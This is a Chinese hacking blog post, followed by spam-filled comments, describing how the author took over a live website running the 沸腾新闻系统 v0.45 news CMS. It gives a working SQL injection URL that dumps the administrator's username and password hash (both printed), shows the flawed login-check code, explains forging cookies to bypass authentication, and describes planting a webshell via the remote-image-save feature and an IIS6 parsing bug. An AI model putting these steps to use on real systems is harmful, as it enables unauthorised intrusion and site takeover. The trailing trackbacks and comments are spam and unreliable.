沸腾新闻系统 v0.45 拿 SHELL
作者:st0p
转载请注明出处:http://www.st0p.org
注:已提醒目标站管理员补洞.
看到群里的無材发来一站,打开看了一下,很像是沸腾新闻系统,不过版本写的是V0.1,网上没找到相应的版本,发现有1.1和0.45两个版本,记得在News.asp存在注入来着,试了一下,的确可以,不过因为版本不同,所以news表的字段不同,所有语句有点不同。
经过st0p的尝试,目标站应该是0.45的,通过以下语句成功得到后台用户名和密码HASH,我是试到27个字段时成功的。。
1 | http://st0p.org/News.asp?click=1&shu=20%201%20as%20NewsID,username%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin%20%20order%20by%202%20desc%20union%20select%20top%202 |
看到没,我们得到了用户名xcb,密码为c95ca278a74775f8,然后我们去破解MD5,郁闷,查不到,无法破解,难道无法进入后台来着。。。
然后我查看了一下0.45版的代码,发现了验证用户登陆的部分在admin/chkuser.asp中,我们看一下代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | <% IF not(Request.cookies("KEY")="super" or Request.cookies("KEY")="check" or Request.cookies("KEY")="typemaster" or Request.cookies("KEY")="bigmaster" or Request.cookies("KEY")="smallmaster" or Request.cookies("KEY")="selfreg") THEN '首先检测cookies中的key,如果不为上面的值,自动转向登陆页面 response.redirect "login.asp" response.end END IF set urs=server.createobject("adodb.recordset") sql="select * from admin where username='"&Request.cookies("username")&"'" '查询cookies中username是否是管理用户 urs.open sql,conn,1,3 if urs.bof or urs.eof then response.redirect "login.asp" response.end end if IF Request.cookies("passwd")<>urs("passwd") THEN '如果用户存在,验诈cookies中的passwd字段是否和用户的密码HASH相同,不同则转向 response.redirect "login.asp" response.end END IF urs.close set urs=nothing %> |
嘿嘿,运气还真好,虽然无法破解密码HASH,但可以利用它实现欺骗。看利用过程。。
我们用domain打开http://st0p.org/admin/index.asp,这时他会转到login.asp
然后我们删掉cookies中的reglevel; fullname; purview; KEY; UserName部分,然后添加UserName=xcb; KEY=super; passwd=c95ca278a74775f8,用户名和密码自己替换,key直接用super就可以了。
我们点修改
然后改网址改为http://st0p.org/admin/index.asp,点链接
成功进入后台,嘿,我们直接来提权吧,这个系统有个保存远程图片的功能,我们就用他来拿SHELL了
首先,添加文章,然后在编辑器中插件图片,地址为咱们的服务器上的马,点插入,选中保存远程图片。然后提交
然后我们就只需要访问添加好的文章,复制里面的图片的地址就行了。目标站的服务器是IIS6,前段不是还报了一下解析漏洞吧,正好利用一下,嘿嘿。
现在我们已经有了一句话的小马,然后该干嘛就不用我说了吧。。。
不过目标站的权限相当BT,只有上传目录可写,还不能删除。。唉,慢慢提权吧,先记录一下。。。
73 Responses
to “沸腾新闻系统 v0.45 拿 SHELL”
64 Trackback(s)
- Oct 7, 2009: 尘缘雅境图文系统拿SHELL思路-IIS6 解析漏洞, 上传漏洞, 尘缘, 尘缘雅境, 沸腾, 注入, 远程保存图片, -st0p's blog
- Oct 7, 2009: 尘缘雅境图文系统拿SHELL思路-远程保存图片, 注入, 沸腾, 尘缘雅境, 尘缘, 上传漏洞, IIS6 解析漏洞, -lixiaopeng's blog
- Nov 5, 2011: wet basements in Maxwell IN
- Nov 6, 2011: payday loans uk
- Nov 10, 2011: improve vision
- Nov 11, 2011: retire in the philippines
- Nov 11, 2011: Price comparison
- Nov 11, 2011: diseño web
- Nov 12, 2011: free nfl picks
- Nov 12, 2011: sua chua kefir
- Nov 14, 2011: How to save my marriage
- Nov 14, 2011: atlanta carpet cleaning
- Nov 14, 2011: Duncan Hines coupons
- Nov 15, 2011: wow hunter guide
- Nov 15, 2011: does vigrx plus work
- Nov 16, 2011: How to SEO
- Nov 16, 2011: hardwood flooring installation CT
- Nov 16, 2011: ecover creator
- Nov 16, 2011: moving long distance
- Nov 16, 2011: Mario games to play
- Nov 16, 2011: Flower of the month club
- Nov 17, 2011: dining solutions direct
- Nov 18, 2011: dining solutions direct
- Nov 18, 2011: Amazon Fires
- Nov 19, 2011: Car Hire Ayia Napa
- Nov 19, 2011: liberty reserve
- Nov 20, 2011: Frontierville
- Nov 20, 2011: online public relations
- Nov 21, 2011: roja directa
- Nov 21, 2011: Yaz Lawsuits
- Nov 22, 2011: amazon coupons
- Nov 22, 2011: Removals France
- Nov 22, 2011: cheap ink toner cartridges
- Nov 23, 2011: online casino uk
- Nov 23, 2011: on fire matrix
- Nov 23, 2011: watch Greys Anatomy online
- Nov 24, 2011: medical negligence compensation
- Nov 24, 2011: personal injury solicitor
- Nov 24, 2011: cocaine addiction
- Nov 28, 2011: whiplash symptoms
- Nov 29, 2011: tuenti
- Nov 29, 2011: food while camping
- Nov 29, 2011: Tampa adult shop
- Nov 30, 2011: Morton
- Dec 2, 2011: videos
- Dec 3, 2011: lesbian porn
- Dec 3, 2011: Sua tuoi
- Dec 4, 2011: videos
- Dec 5, 2011: cheap sex toys
- Dec 6, 2011: carpet installation CT
- Dec 7, 2011: Skip Hire Manchester
- Dec 13, 2011: mudjacking Kansas City
- Dec 19, 2011: Carrier Parts
- Dec 25, 2011: Buy Facebook Fans
- Dec 27, 2011: Dominos coupon code
- Dec 28, 2011: uk lotto
- Dec 28, 2011: http://www.pkv-wechsel.eu/
- Dec 28, 2011: private krankenversicherung
- Dec 28, 2011: video production jersey city nj
- Jan 7, 2012: Warlock
- Jan 12, 2012: injury compensation
- Jan 13, 2012: coffee
- Jan 15, 2012: basement waterproofing Raymond OH
- Jan 24, 2012: tanie czytanie
You must be logged in to post a comment.
大牛st0p~~~~膜拜
不是这个系统 ..
尘缘雅境..
st0p Reply:
September 26th, 2009 at 12:21 pm
你说的是我搞的这个?
和0.45的沸腾新闻系统一样的,
icysun Reply:
September 26th, 2009 at 12:30 pm
是的
st0p牛 你不是日我们学校么 怎么还不去
dCATec qhuvtpiheyue, [url=http://ggwyligshlfd.com/]ggwyligshlfd[/url], [link=http://nxjhtastnpxn.com/]nxjhtastnpxn[/link], http://kwxzxruczflr.com/
T9v9E0 oihbhcyxrstd, [url=http://ztggdtdbkkjc.com/]ztggdtdbkkjc[/url], [link=http://haboolnldgjd.com/]haboolnldgjd[/link], http://zsjtcxcsvmjj.com/
eh.. thank you for this thoughts
)
The loans seem to be useful for people, which are willing to start their own career. As a fact, that's not hard to get a commercial loan.